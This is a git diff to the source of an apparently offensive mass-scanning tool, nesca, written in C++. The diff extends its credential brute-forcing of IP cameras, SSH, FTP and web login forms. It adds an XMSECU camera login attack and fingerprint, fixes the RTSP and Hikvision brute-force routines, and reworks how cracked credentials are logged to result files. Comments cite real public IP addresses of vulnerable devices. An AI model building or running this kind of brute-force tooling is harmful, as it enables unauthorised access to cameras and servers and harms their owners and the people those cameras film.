a/IPCAuth.cpp +++ b/IPCAuth.cpp @@ -6,14 +6,15 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *cookie) { lopaStr lps = {"UNKNOWN", "", ""}; - bool result = true; + int result = 0; char login[128] = {0}; char pass[128] = {0}; char request[1024] = {0}; int passCounter = 1; int rowIndex = -1; - std::vector negVector; + std::vector negVector; + std::vector slideVector; if(strcmp(SPEC, "IPC") == 0) { negVector.push_back("Invalid"); @@ -91,6 +92,11 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c { negVector.push_back("Invalid credentials"); } + else if (strcmp(SPEC, "XMSECU") == 0) + { + slideVector.push_back("errornumber=-1"); + negVector.push_back("Log in failed"); + } else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); @@ -101,22 +107,20 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c for(int i = 0; i < MaxLogin; ++i) { if(!globalScanFlag) break; - if(strcmp(loginLst[i], " ") == 0) continue; - //ZeroMemory(login, sizeof(login)); - login[0] = 0; - strcpy(login, loginLst[i]); + FileUpdater::cv.wait(FileUpdater::lk, [] {return FileUpdater::ready; }); + strcpy(login, loginLst[i]); + if(strcmp(login, " ") == 0) continue; for(int j = 0; j < MaxPass; ++j) { FileUpdater::cv.wait(FileUpdater::lk, []{return FileUpdater::ready;}); if(!globalScanFlag) break; if(strcmp(passLst[j], " ") == 0) continue; + result = 0; - //ZeroMemory(pass, sizeof(pass)); - pass[0] = 0; strcpy(pass, passLst[j]); - //ZeroMemory(request, sizeof(request)); + ZeroMemory(request, sizeof(request)); request[0] = 0; if(strcmp(SPEC, "IPC") == 0) { @@ -191,7 +195,6 @@ lopaStr IPC::IPCBrute(const char *ip, int port, char *SPEC, const std::string *c } else if (strcmp(SPEC, "JUAN") == 0) { - //sprintf(request, "%s:%d/cgi-bin/gw.cgi?xml=&_=1450923182693", sprintf(request, "%s/cgi-bin/gw.cgi?xml=%%3Cjuan%%20ver=%%22%%22%%20squ=%%22%%22%%20dir=%%22%%22%%3E%%3Cenvload%%20type=%%220%%22%%20usr=%%22%s%%22%%20pwd=%%22%s%%22/%%3E%%3C/juan%%3E&_=1450923182693", ip, login, pass); } @@ -226,6 +229,12 @@ Content-Disposition: form-data; name=\"password\"\r\n\ Content-Length: %d\r\n\r\n\ %s", cl, tempPostData); } + else if (strcmp(SPEC, "XMSECU") == 0) + { + doPost = true; + sprintf(request, "%s/Login.htm", ip); + sprintf(postData, "command=login&username=%s&password=%s", login, pass); + } std::string buffer; if (cookie->size() > 0) { @@ -241,65 +250,53 @@ Content-Length: %d\r\n\r\n\ } if (res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } else if (res != -1) { + for (int i = 0; i < slideVector.size(); ++i) + { + if (Utils::ustrstr(buffer, slideVector[i]) != -1) + { + result = -1; + break; + }; + } + if (-1 == result) { + passCounter += MaxPass - 1; + break; + } + for (int i = 0; i < negVector.size(); ++i) { if (Utils::ustrstr(buffer, negVector[i]) != -1) { - result = false; + result = 1; break; }; }; - if (result) + if (0 == result) { - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); + strcpy(lps.login, login); + strcpy(lps.pass, pass); - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), "OK"); - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), "OK", rowIndex); return lps; - }; + } } else { return lps; } - - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(ip), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; Sleep(100); }; }; - if (rowIndex == -1) { - nesca_3::addBARow(QString(ip), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + + rowIndex = Utils::addBARow(QString(ip), "--", "FAIL", rowIndex); return lps; } diff --git a/MainStarter.cpp b/MainStarter.cpp index 8ba17ea..e52e4f0 100644 --- a/MainStarter.cpp +++ b/MainStarter.cpp @@ -1399,7 +1399,7 @@ void MainStarter::runAuxiliaryThreads() { void MainStarter::createResultFiles() { char fileName[256] = { 0 }; - sprintf(fileName, "./result_files-%s", Utils::getStartDate().c_str()); + sprintf(fileName, "./" DIR_NAME "%s_%s", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) bool res = CreateDirectoryA(fileName, NULL); if (!res) { @@ -1484,6 +1484,10 @@ void MainStarter::start(const char* targets, const char* ports) { thread_setup(); + + QString fileSuffix = QString(targets); + fileSuffix = fileSuffix.mid(fileSuffix.lastIndexOf("/") + 1); + Utils::setCurrentTarget(fileSuffix.toUtf8().constData()); createResultFiles(); if (loadTargets(targets) == -1 || diff --git a/SSHAuth.cpp b/SSHAuth.cpp index 123021e..d80db76 100644 --- a/SSHAuth.cpp +++ b/SSHAuth.cpp @@ -83,19 +83,15 @@ int _sshConnect(const char *user, const char *pass, const char *host, int port) return 0; } -int check_ssh_pass(const int rowIndex, const char *user, const char *pass, +int check_ssh_pass(int rowIndex, const char *user, const char *pass, const char *userPass, const char *host, int port, std::string *buffer, const char *banner) { int res = _sshConnect(user, pass, host, port); if(res == 0) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(userPass) + "@" + QString(host), "OK"); - } + rowIndex = Utils::addBARow(QString(host), QString(userPass) + "@" + QString(host), "OK", rowIndex); + buffer->append(userPass); buffer->append("@"); buffer->append(host); @@ -132,61 +128,29 @@ int SSHBrute(const char* host, int port, std::string *buffer, const char *banner strncpy(login, temp, ptr1 - temp); strcpy(pass, ptr1 + 1); - if (BALogSwitched) { - if (rowIndex == -1) { - rowIndex = nesca_3::addBARow(QString(host) + ":" + QString::number(port), - QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%"); - } - } - else { rowIndex = -1; } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), QString(login) + ":" + QString(pass), QString::number((passCounter / (double)(MaxSSHPass)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; res = check_ssh_pass(rowIndex, login, pass, temp, host, port, buffer, banner); - //ZeroMemory(login, sizeof(login)); - //ZeroMemory(pass, sizeof(pass)); - //ZeroMemory(temp, sizeof(temp)); - login[0] = 0; - pass[0] = 0; - temp[0] = 0; if(res == 0) { if (i == 0) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAILHIT"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAILHIT", rowIndex); return -2; //Failhit } return 1; } else if(res == -2) { - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); return -2; }; Sleep(500); }; - if (rowIndex == -1) { - nesca_3::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL"); - } - else { - stt->doEmitionChangeBARow(rowIndex, "--", "FAIL"); - } + rowIndex = Utils::addBARow(QString(host) + ":" + QString::number(port), "--", "FAIL", rowIndex); return -1; } diff --git a/Utils.cpp b/Utils.cpp index 002a07c..0120a95 100644 --- a/Utils.cpp +++ b/Utils.cpp @@ -1,8 +1,10 @@ #include "Utils.h" #include +#include "STh.h" std::string Utils::startDate; std::string Utils::startTime; +std::string Utils::currentTarget; //void Utils::emitScaryError() { // __asm{ @@ -45,26 +47,44 @@ std::string Utils::getHeaderValue(std::string *buff, const std::string headerVal } void Utils::saveStartDate() { QDate date = QDate::currentDate(); - startDate = std::to_string(date.day()) - + "_" - + std::to_string(date.month()) - + "_" - + std::to_string(date.year()); + startDate = date.toString("dd.MM.yyyy").toUtf8().constData(); } + void Utils::saveStartTime() { QTime time = QTime::currentTime(); - startTime = std::to_string(time.hour()) - + "_" - + std::to_string(time.minute()); + startTime = time.toString("HH_mm").toUtf8().constData(); } std::string Utils::getStartDate() { return startDate; } +int Utils::addBARow(QString str1, QString str2, QString str3, int rowIndex) { + if (BALogSwitched) { + if (rowIndex == -1) { + rowIndex = nesca_3::addBARow(str1, str2, str3); + } + else { + stt->doEmitionChangeBARow(rowIndex, str2, str3); + } + + return rowIndex; + } + + return -1; +} + std::string Utils::getStartTime() { return startTime; } +void Utils::setCurrentTarget(const std::string target) { + currentTarget = target; +} + +std::string Utils::getCurrentTarget() { + return currentTarget; +} + int Utils::isDigest(const std::string *buffer) { if (Utils::ustrstr(buffer, "401 authorization") != -1 || Utils::ustrstr(buffer, "401 unauthorized") != -1 diff --git a/Utils.h b/Utils.h index 83235ce..b7041de 100644 --- a/Utils.h +++ b/Utils.h @@ -28,6 +28,7 @@ private: class Utils { private: static std::string startDate; private: static std::string startTime; +private: static std::string currentTarget; public: static int isDigest(const std::string *buffer); @@ -53,7 +54,7 @@ public: else return -1; } - template static int ustrstr(const T *str1, + template static int ustrstr(T *str1, const char* str2c, const locale& loc = locale()) { @@ -91,7 +92,10 @@ public: static void saveStartTime(); static std::string getStartDate(); static std::string getStartTime(); + static void setCurrentTarget(const std::string target); + static std::string getCurrentTarget(); static void emitScaryError(); + static int addBARow(QString str1, QString str2, QString str3, int rowIndex); static std::string getHeaderValue(std::string *buff, const std::string headerValue, const std::string outputName); }; diff --git a/WebformWorker.cpp b/WebformWorker.cpp index a98db13..34e04a2 100644 --- a/WebformWorker.cpp +++ b/WebformWorker.cpp @@ -83,17 +83,7 @@ lopaStr WFClass::doGetCheck(const char *ip, Connector con; if(con.nConnect(nip, port, &buffer) <= 0) return result; - if (BALogSwitched) { - if (rowIndex == -1) { - //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port), - // QString(login) + ":" + QString(pass), - // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - } + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); result = parseResponse(ip, port, &buffer, formVal, login, pass); if(i == 0) ++i; @@ -144,18 +134,8 @@ lopaStr WFClass::doPostCheck(const char *ip, std::string buffer; Connector con; if (con.nConnect(nip, port, &buffer, postData) <= 0) return result; - - if (BALogSwitched) { - if (rowIndex == -1) { - //stt->doEmitionAddBARow(rowIndex, QString(ip) + ":" + QString::number(port), - // QString(login) + ":" + QString(pass), - // QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - else { - stt->doEmitionChangeBARow(rowIndex, QString(login) + ":" + QString(pass), - QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%"); - } - } + + rowIndex = Utils::addBARow(QString(ip), QString(login) + ":" + QString(pass), QString::number((++passCounter / (double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%", rowIndex); ++passCounter; return parseResponse(ip, port, &buffer, formVal, login, pass); diff --git a/finder.cpp b/finder.cpp index d1ff65a..1bebaab 100644 --- a/finder.cpp +++ b/finder.cpp @@ -248,21 +248,28 @@ bool isNegative(const std::string *buff, const char *ip, int port, const char *c } } - std::size_t ptr1 = buff->find("\r\n\r\n"); - if (ptr1 != -1) { - int sz = buff->size(); - int nSz = buff->substr(ptr1, sz).size() - 4; - if (nSz < 100) { - if (gNegDebugMode) - { - QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); - stt->doEmitionDebugFoundData("[" + QString(ip) + - "]\tNegative hit: Size:" + QString::number(nSz)); - } - return true; - } - } + //if (buff->size() < 200) { + // if (buff->find("rtsp") == -1) { + // std::size_t ptr1 = buff->find("\r\n\r\n"); + // if (ptr1 != -1) { + // int sz = buff->size(); + // int nSz = buff->substr(ptr1, sz).size() - 4; + // if (nSz < 100) { + // if (gNegDebugMode) + // { + // QTextCodec *nCodec = QTextCodec::codecForName("Windows-1251"); + // stt->doEmitionDebugFoundData("[" + QString(ip) + + // "]\tNegative hit: Size:" + QString::number(nSz)); + // } + + // ++filtered; + // return true; + // } + // } + // } + //} + return false; } int globalSearchPrnt(const std::string *buff) @@ -391,7 +398,7 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const if(Utils::ustrstr(buffcpy, "hikvision-webs") != -1 || ( (Utils::ustrstr(buffcpy, "hikvision digital") != -1 || Utils::ustrstr(buffcpy, "doc/page/login.asp") != -1) - && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1) + && Utils::ustrstr(buffcpy, "dvrdvs-webs") != -1 || Utils::ustrstr(buffcpy, "app-webs") != -1 || Utils::ustrstr(buffcpy, "DNVRS-Webs") != -1) || (Utils::ustrstr(buffcpy, "lapassword") != -1 && Utils::ustrstr(buffcpy, "lausername") != -1 @@ -463,10 +470,12 @@ int sharedDetector(const char * ip, int port, const std::string *buffcpy, const && Utils::ustrstr(buffcpy, "login_chk_usr_pwd") != -1 ) return 57; //Network video client (http://203.190.113.54:60001/) if (Utils::ustrstr(buffcpy, "QlikView") != -1) return 58; //QLikView (http://203.96.113.183/qlikview/login.htm) - if (Utils::ustrstr(buffcpy, "RTSP/1.0") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam) + if (Utils::ustrstr(buffcpy, "RTSP/1.") != -1) return 59; //RTSP (http://121.72.55.19:554/ Hisilicon Ipcam) if (Utils::ustrstr(buffcpy, "ACTi Corporation") != -1) return 60; //ACTi (http://87.197.30.20/cgi-bin/videoconfiguration.cgi) if (Utils::ustrstr(buffcpy, "airos_logo") != -1) return 61; //AirOS (http://103.5.73.114/login.cgi?uri=/) - + if (Utils::ustrstr(buffcpy, "NetSuveillanceWebCookie") != -1 && + Utils::ustrstr(buffcpy, "resizeL") != -1) return 62; //XMSECU (http://121.72.179.76/Login.htm) + //if (Utils::ustrstr(buffcpy, "ShareCenter") != -1) return 58; //ShareCenter (http://49.50.207.6/) if (Utils::ustrstr(buffcpy, "nas - ") != -1 @@ -597,12 +606,12 @@ int __checkFileExistence(int flag) { char fileName[64] = {0}; - if (flag == -22) sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str()); - else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str()); - else if (flag == 3) sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str()); - else if (flag == 16) sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str()); + if (flag == -22) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 0 || flag == 15 || flag == -10) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 3) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); + else if (flag == 16) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); else if(flag >= 17 || flag == 11 || flag == 12 - || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str()); + || flag == 13 || flag == 14 || flag == 1) sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); FILE *f = fopen(fileName, "r"); if(f == NULL) return true; @@ -620,44 +629,39 @@ bool ftsBA = true; std::atomic fOpened(false); void fputsf(char *text, int flag) { - FILE *file = NULL; - char fileName[256] = { 0 }; if(flag == 0 || flag == 15 || flag == -10) { - if (ftsCameras) ftsCameras = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE1 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + if (ftsCameras) ftsCameras = __checkFileExistence(flag); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE1 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == 1) { if(ftsOther) ftsOther = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE2 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE2 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == -22) { if(ftsSSH) ftsSSH = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE5 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE5 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag == 3) { if(ftsFTP) ftsFTP = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE4 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE4 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else if(flag >= 17 || flag == 11 || flag == 12 || flag == 13 || flag == 14 || flag == 2 ) { if(ftsBA) ftsBA = __checkFileExistence(flag); - sprintf(fileName, "./result_files-%s/" TYPE3 ".html", Utils::getStartDate().c_str()); - file = fopen(fileName, "a"); + sprintf(fileName, "./" DIR_NAME "%s_%s/" TYPE3 ".html", Utils::getStartDate().c_str(), Utils::getCurrentTarget().c_str()); } else stt->doEmitionRedFoundData("Unknown flag [FLAG: " + QString::number(flag) + "]"); + FILE *file = fopen(fileName, "a"); + if(file != NULL) { time_t rtime; @@ -874,7 +878,7 @@ void _specFillerCustom(const char *ip, int port, const char *finalstr, const cha if (strlen(login) > 0 || strlen(pass) > 0) { - sprintf(log, "%s:%s (%s:%s) T: %s\n", + sprintf(log, "%s: %s (%s:%s) T: %s\n", classString, ip, ip, login, pass, finalstr); } @@ -911,20 +915,20 @@ void _specFillerBA(const char *ip, int port, const char *finalstr, const char *l if (strlen(login) > 0 || strlen(pass) > 0) { if (8 == offset) { - sprintf(log, "[BA]:%s:%s@%s T: %s\n", + sprintf(log, "[BA]: %s:%s@%s T: %s\n", login, pass, ip + offset, login, pass, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s:%s@%s T: %s\n", + sprintf(log, "[BA]: %s:%s@%s T: %s\n", login, pass, ip + offset, login, pass, ip + offset, finalstr); } } else { if (8 == offset) { - sprintf(log, "[BA]:%s T: %s\n", + sprintf(log, "[BA]: %s T: %s\n", ip + offset, ip + offset, finalstr); } else { - sprintf(log, "[BA]:%s T: %s\n", + sprintf(log, "[BA]: %s T: %s\n", ip + offset, ip + offset, finalstr); } } @@ -942,15 +946,15 @@ void _specFillerRSTP(const char *ip, int port, const char *finalstr, const char if (strlen(login) > 0 || strlen(pass) > 0) { - sprintf(log, "[RSTP]:%s:%d (%s:%s) T: %s\n", - ip, port, login, pass, finalstr); + sprintf(log, "[RSTP]: %s11 (%s:%s) T: %s\n", + ip, ip, login, pass, finalstr); } else { - sprintf(log, "[RSTP]:%s:%d T: %s\n", - ip, port, finalstr); + sprintf(log, "[RSTP]: %s11 T: %s\n", + ip, ip, finalstr); } - stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "FF69B4"); + stt->doEmitionFoundDataCustom(QString::fromLocal8Bit(log), "3090C7"); fputsf(log, flag); } @@ -1384,10 +1388,12 @@ int _specRTSPBrute(const char *ip, int port, return -1; } - if (strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) + if (strstr(lps.login, "UNKNOWN") == NULL) { - _specFillerRSTP(ip, port, finalstr, lps.login, lps.pass, flag); - fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP"); + char title[512] = { 0 }; + sprintf(title, "%s %s", lps.other, finalstr); + _specFillerRSTP(ip, port, title, lps.login, lps.pass, flag); + //fillGlobalLogData(ip, port, std::to_string(size).c_str(), finalstr, lps.login, lps.pass, "", cp, "RTSP"); }; } @@ -2677,7 +2683,7 @@ std::string equivRedirectHandler(std::string *buff, char* ip, int port, Lexems * int portPos = location.find(":", 7); if (-1 != portPos) { - int portPosEnd = location.find("/ \n>\"'", portPos); + int portPosEnd = location.find_first_of("/ \n>\"'", portPos); if (-1 != portPosEnd) { newPort = std::stoi(location.substr(portPos + 1, portPosEnd)); if (gDebugMode) { @@ -2898,6 +2904,9 @@ std::string getHeader(const std::string *buffcpy, const int flag) { return "[IOmega NAS]"; } } + else if (STRSTR(buffcpy, "x-rtsp-tunnelled") != -1 || STRSTR(buffcpy, "rtsp://") != -1) { + return "[RTSP]"; + } else { std::string tempBuff = buffcpy->c_str(); const std::string &result_ref = getTitle(tempBuff.c_str(), flag); @@ -3013,7 +3022,7 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con HikVis::hikCounter = 0; HikVis::hikPart++; } - sprintf(fileName, "./result_files-%s/hikkafile_%s_part_%d.csv", date, date, HikVis::hikPart); + sprintf(fileName, "./" DIR_NAME "%s_%s/hikkafile_%s_part_%d.csv", date, Utils::getCurrentTarget().c_str(), date, HikVis::hikPart); FILE *f = fopen(fileName, "a"); if (f != NULL) { char string[1024] = { 0 }; @@ -3047,8 +3056,8 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con HikVis::rviCounter = 0; HikVis::rviPart++; } - sprintf(fileName, "./result_files-%s/rvifile_%s(%s)_part_%d.xml", - date, date, Utils::getStartTime().c_str(), HikVis::rviPart); + sprintf(fileName, "./" DIR_NAME "%s_%s/rvifile_%s(%s)_part_%d.xml", + date, Utils::getCurrentTarget().c_str(), date, Utils::getStartTime().c_str(), HikVis::rviPart); char string[1024] = { 0 }; FILE *fc = fopen(fileName, "r"); @@ -3132,8 +3141,15 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con } else if (flag == 34) //Hikvision ip cam { - if (_specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){ - _specBrute(ip, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size); + char ipNew[256] = { 0 }; + if (strstri(ip, "https://") != NULL) { + sprintf(ipNew, "https://%s", ipRaw); + } + else { + sprintf(ipNew, "http://%s", ipRaw); + } + if (_specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/SelfExt/userCheck", "[DIGEST]", cp, size) == -1){ + _specBrute(ipNew, port, "[Hikvision] IP Camera", flag, "/PSIA/Custom/HIK/userCheck", "[DIGEST]", cp, size); } } else if (flag == 35) //EasyCam @@ -3269,11 +3285,9 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con } else if (flag == 59) //RTSP { - //char newIP[128] = {0}; - //strcpy(newIP, "rtsp://"); - //strncat(newIP, ipRaw, 96); - //strcat(newIP, "/"); - _specRTSPBrute(ipRaw, port, header.c_str(), flag, "RTSP", cp, size); + char newIP[128] = {0}; + sprintf(newIP, "rtsp://%s:%d/", ipRaw, port); + _specRTSPBrute(newIP, port, header.c_str(), flag, "RTSP", cp, size); } else if (flag == 60) //ACTi { @@ -3283,7 +3297,11 @@ void parseFlag(int flag, char* ip, char *ipRaw, int port, std::string *buff, con { _specWEBIPCAMBrute(ip, port, "[AirOS] WEB IP Camera", flag, "WEB Authorization", cp, size, "AirOS", &cookie); } - + else if (flag == 62) //XMSECU + { + _specWEBIPCAMBrute(ip, port, "[XMSECU] WEB IP Camera", flag, "WEB Authorization", cp, size, "XMSECU", &cookie); + } + else if (flag == 20) //AXIS Camera { if (_specBrute(ip, port, "AXIS Camera", flag, "/mjpg/video.mjpg", "Basic Authorization", cp, size) == -1) { @@ -3359,19 +3377,26 @@ std::string handleRedirects(std::string *buffcpy, char* ip, int port) { counter.iterationCount = 0; std::string location = std::string(ip); const std::string &locationEquiv = equivRedirectHandler(buffcpy, ip, port, &counter); - location += locationEquiv; + if (locationEquiv.find("http") == 0) { + location = locationEquiv; + } + else { + location += locationEquiv; + } counter.iterationCount = 0; if (Utils::ustrstr((const std::string *) buffcpy, " 0) { + if (Utils::ustrstr(location, "http") != -1) { + location = locationJS; + } + else { + location += locationJS; + } } }; - + return location; } int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, int flag, char *cp) { @@ -3452,7 +3477,15 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newPort = port; int portPos = location.find(":", 8); if (-1 != portPos) { - newPort = std::stoi(location.substr(portPos + 1)); + int secPos = location.find("/", 8); + if (-1 != secPos) { + if (portPos < secPos) { + newPort = std::stoi(location.substr(portPos + 1, secPos - portPos - 1)); + } + } + else { + newPort = std::stoi(location.substr(portPos + 1)); + } } newIP = location; } @@ -3463,7 +3496,15 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newPort = 443; int portPos = location.find(":", 8); if (-1 != portPos) { - newPort = std::stoi(location.substr(portPos + 1)); + int secPos = location.find("/", 8); + if (-1 != secPos) { + if (portPos < secPos) { + newPort = std::stoi(location.substr(portPos + 1, secPos - portPos - 1)); + } + } + else { + newPort = std::stoi(location.substr(portPos + 1)); + } } newIP = location; } @@ -3471,7 +3512,7 @@ int handleFramesets(std::string *buffcpyOrig, char* ip, char* ipRaw, int port, i newIP += location; } } - stt->doEmitionYellowFoundData("Location: " + QString(newIP.c_str()) + "; Port: " + QString::number(newPort)); + //stt->doEmitionYellowFoundData("Location: " + QString(newIP.c_str()) + "; Port: " + QString::number(newPort)); parseFlag(flag, (char*)newIP.c_str(), ipRaw, newPort, buffcpyOrig, header, cp); return flag; } diff --git a/mainResources.h b/mainResources.h index eada05d..076a1bc 100644 --- a/mainResources.h +++ b/mainResources.h @@ -88,21 +88,22 @@ typedef int BOOL; #define TITLE_MAX_SIZE 512 #define COOKIE_MAX_SIZE 1024 -#define TYPE1 "camera" -#define TYPE2 "other" -#define TYPE3 "auth" -#define TYPE4 "ftp" -#define TYPE5 "ssh" +#define TYPE1 "camera" +#define TYPE2 "other" +#define TYPE3 "auth" +#define TYPE4 "ftp" +#define TYPE5 "ssh" +#define DIR_NAME "results_" #define PWD_LIST_FOLDER "./pwd_lists/" -#define LOGIN_FN PWD_LIST_FOLDER"login.txt" -#define PASS_FN PWD_LIST_FOLDER"pass.txt" -#define FTP_LOGIN_FN PWD_LIST_FOLDER"ftplogin.txt" -#define FTP_PASS_FN PWD_LIST_FOLDER"ftppass.txt" -#define WF_LOGIN_FN PWD_LIST_FOLDER"wflogin.txt" -#define WF_PASS_FN PWD_LIST_FOLDER"wfpass.txt" -#define SSH_PASS_FN PWD_LIST_FOLDER"sshpass.txt" -#define NEGATIVE_FN PWD_LIST_FOLDER"negatives.txt" +#define LOGIN_FN PWD_LIST_FOLDER "login.txt" +#define PASS_FN PWD_LIST_FOLDER "pass.txt" +#define FTP_LOGIN_FN PWD_LIST_FOLDER "ftplogin.txt" +#define FTP_PASS_FN PWD_LIST_FOLDER "ftppass.txt" +#define WF_LOGIN_FN PWD_LIST_FOLDER "wflogin.txt" +#define WF_PASS_FN PWD_LIST_FOLDER "wfpass.txt" +#define SSH_PASS_FN PWD_LIST_FOLDER "sshpass.txt" +#define NEGATIVE_FN PWD_LIST_FOLDER "negatives.txt" #define HTTP_FILE_STYLE "